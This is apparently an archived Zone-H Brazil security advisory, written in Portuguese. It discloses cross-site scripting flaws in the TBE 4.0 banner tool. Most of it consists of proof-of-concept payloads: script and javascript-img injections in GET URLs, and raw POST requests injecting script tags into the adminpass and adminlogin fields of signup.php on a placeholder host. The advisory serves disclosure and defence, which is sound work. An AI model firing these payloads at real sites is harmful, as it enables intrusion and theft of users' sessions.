Zone-H
Home arrow Avisos de Segurança arrow TBE 4.0: Falhas de Cross Site Script
21 de março de 2010
  
 
Ataques desta semana
O.S.  Defs.  %
Linux  10760  68.37%
Win 2003  4480  28.47%
FreeBSD  213  1.35%
Win 2000  105  0.67%
Win 2008  90  0.57%
Other  90  0.57%

Total de ataques: 15738 dos quais 2597 único(s) no ip e 13141 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
TBE 4.0: Falhas de Cross Site Script Imprimir E-mail
Avaliação do Usuário: / 1
PiorMelhor 
Por Marcelo Almeida (Vympel)   
03 de julho de 2006
A ferramenta de criação de banner tbe4.0 Native Solutions possuí falha do tipo XSS

Exemplos de falhas econtradas no script:

http://target.xx/top.php?action=search&catid=catid&text=%3Cscript%3Ealert(%22Ellipsis+Security+Test%22)%3C/script%3E
http://target.xx/top.php?action=search&catid=catid&text=%3Cimg%20src=%22javascript:alert('Ellipsis+Security+Test');%22%3E 
...




---



POST http://target.xx:80/signup.php HTTP/1.0



Accept: */*



Content-Type: application/x-www-form-urlencoded



Host: target.xx



Content-Length: 127



adminpass="><script>alert(/Ellipsis+Security+Test/)</script>&adminlogin=1&action=1&login=1&password=1&bid=1&bnumr=1



---



POST http://target.xx:80/signup.php HTTP/1.0



Accept: */*



Content-Type: application/x-www-form-urlencoded



Host: target.xx



Content-Length: 127



adminpass=1&adminlogin="><script>alert(/Ellipsis+Security+Test/)</script>&action=1&login=1&password=1&bid=1&bnumr=1



-----------------



Ellipsis Security

http://ellsec.org
 
< Anterior   Próximo >
[Voltar]
 
Top!
(C) 2010 Zone-H - Unrestricted Information
Top!